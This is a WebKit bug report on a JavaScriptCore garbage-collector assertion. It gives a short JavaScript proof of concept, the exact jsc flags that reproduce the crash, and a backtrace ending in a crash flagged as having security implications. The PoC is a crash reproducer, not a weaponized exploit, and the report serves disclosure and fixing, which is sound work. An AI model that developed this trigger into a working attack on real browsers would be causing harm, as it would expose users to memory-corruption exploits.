[Webkit-unassigned] [Bug 231136] New: Assertion error in StructureIDTable.h

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Sun Oct 3 05:14:47 PDT 2021


https://bugs.webkit.org/show_bug.cgi?id=231136

            Bug ID: 231136
           Summary: Assertion error in StructureIDTable.h
           Product: WebKit
           Version: WebKit Local Build
          Hardware: Unspecified
                OS: Unspecified
            Status: NEW
          Severity: Normal
          Priority: P2
         Component: JavaScriptCore
          Assignee: webkit-unassigned at lists.webkit.org
          Reporter: pangbin2415 at gmail.com

PoC:

```
function main() {
    const v3 = [-4294967295,-262158.0803324459];
    const v4 = [];
    function v5(v6,v7) {
        const v9 = [2.2250738585072014e-308,2.2250738585072014e-308,2.2250738585072014e-308,2.2250738585072014e-308];
        const v12 = 0 < 100000;
        const v15 = v7["push"](v12,v3,v3,v9);
        const v16 = Array(100000);
    }
    const v17 = v5("xbCBcbd368",v3);
    for (let v21 = 0; v21 < 100; v21++) {
        const v22 = v5("xbCBcbd368",v4);
    }
    gc();
}
noDFG(main);
noFTL(main);
main();
```

How to reproduce:
```
jsc --validateOptions=true --useConcurrentJIT=false --useConcurrentGC=false --thresholdForJITSoon=10 --thresholdForJITAfterWarmUp=10 --thresholdForOptimizeAfterWarmUp=100 --thresholdForOptimizeAfterLongWarmUp=100 --thresholdForOptimizeSoon=100 --thresholdForFTLOptimizeAfterWarmUp=1000 --thresholdForFTLOptimizeSoon=1000 --validateBCE=true ./poc.js
```

Backtrace:
```
(lldb) bt 20
* thread #1, name = 'jsc', stop reason = signal SIGABRT
  * frame #0: 0x00007ffff46b4fb7 libc.so.6`__GI_raise(sig=<unavailable>) at raise.c:51
    frame #1: 0x00007ffff46b6921 libc.so.6`__GI_abort at abort.c:79
    frame #2: 0x000000000504825b jsc`::WTFCrashWithSecurityImplication() at Assertions.cpp:342:5
    frame #3: 0x000000000224adb3 jsc`JSC::SlotVisitor::appendHiddenSlowImpl(JSC::JSCell*, WTF::Dependency) [inlined] JSC::StructureIDTable::get(this=<unavailable>, structureID=<unavailable>) at StructureIDTable.h:181:5
    frame #4: 0x000000000224ad8a jsc`JSC::SlotVisitor::appendHiddenSlowImpl(JSC::JSCell*, WTF::Dependency) [inlined] JSC::VM::getStructure(this=<unavailable>, id=<unavailable>) at VM.h:928
    frame #5: 0x000000000224ad8a jsc`JSC::SlotVisitor::appendHiddenSlowImpl(JSC::JSCell*, WTF::Dependency) [inlined] JSC::JSCell::structure(this=<unavailable>, vm=<unavailable>) const at JSCellInlines.h:141
    frame #6: 0x000000000224ad8a jsc`JSC::SlotVisitor::appendHiddenSlowImpl(JSC::JSCell*, WTF::Dependency) [inlined] JSC::JSCell::structure() const at JSCellInlines.h:136
    frame #7: 0x000000000224ad8a jsc`JSC::SlotVisitor::appendHiddenSlowImpl(JSC::JSCell*, WTF::Dependency) [inlined] JSC::validate(cell=<unavailable>) at SlotVisitor.cpp:53
    frame #8: 0x000000000224a737 jsc`JSC::SlotVisitor::appendHiddenSlowImpl(this=<unavailable>, cell=0x000062d000127990, dependency=(m_value = 0)) at SlotVisitor.cpp:243
    frame #9: 0x000000000316d9a7 jsc`JSC::Structure* JSC::JSObject::visitButterflyImpl<JSC::SlotVisitor>(JSC::SlotVisitor&) [inlined] JSC::SlotVisitor::appendHiddenUnbarriered(this=<unavailable>) at SlotVisitorInlines.h:76:9
    frame #10: 0x000000000316d98f jsc`JSC::Structure* JSC::JSObject::visitButterflyImpl<JSC::SlotVisitor>(JSC::SlotVisitor&) [inlined] void JSC::SlotVisitor::appendHidden<JSC::Unknown, WTF::RawValueTraits<JSC::Unknown> >(JSC::WriteBarrierBase<JSC::Unknown, WTF::RawValueTraits<JSC::Unknown> > const&) at SlotVisitorInlines.h:116
    frame #11: 0x000000000316d98f jsc`JSC::Structure* JSC::JSObject::visitButterflyImpl<JSC::SlotVisitor>(JSC::SlotVisitor&) at SlotVisitorInlines.h:135
    frame #12: 0x000000000316d917 jsc`JSC::Structure* JSC::JSObject::visitButterflyImpl<JSC::SlotVisitor>(JSC::SlotVisitor&) [inlined] JSC::Structure* JSC::JSObject::visitButterflyImpl<JSC::SlotVisitor>(JSC::SlotVisitor&)::'lambda'(unsigned char)::operator()(unsigned char) const at JSObject.cpp:127
    frame #13: 0x000000000316d88a jsc`JSC::Structure* JSC::JSObject::visitButterflyImpl<JSC::SlotVisitor>(this=<unavailable>, visitor=<unavailable>) at JSObject.cpp:145
    frame #14: 0x0000000003153ac3 jsc`void JSC::JSObject::visitChildrenImpl<JSC::SlotVisitor>(JSC::JSCell*, JSC::SlotVisitor&) [inlined] JSC::Structure* JSC::JSObject::visitButterfly<JSC::SlotVisitor>(visitor=<unavailable>) at JSObject.cpp:108:25
    frame #15: 0x0000000003153ab6 jsc`void JSC::JSObject::visitChildrenImpl<JSC::SlotVisitor>(cell=<unavailable>, visitor=0x00006110000002c0) at JSObject.cpp:424
    frame #16: 0x000000000224be77 jsc`JSC::SlotVisitor::visitChildren(this=0x00006110000002c0, cell=0x000060c00000a2a8) at SlotVisitor.cpp:379:9
    frame #17: 0x000000000223d0ae jsc`JSC::SlotVisitor::drain(WTF::MonotonicTime) at SlotVisitor.cpp:506:21
    frame #18: 0x000000000223cebb jsc`JSC::SlotVisitor::drain(WTF::MonotonicTime) [inlined] JSC::IterationStatus JSC::SlotVisitor::forEachMarkStack<JSC::SlotVisitor::drain(WTF::MonotonicTime)::$_3>(this=<unavailable>)::$_3 const&) at SlotVisitorInlines.h:174
    frame #19: 0x000000000223cebb jsc`JSC::SlotVisitor::drain(this=0x00006110000002c0, timeout=(m_value = +Inf)) at SlotVisitor.cpp:496
```

Version: commit c39a585f82d27f39a87ead44e27d8bed65e9f24e
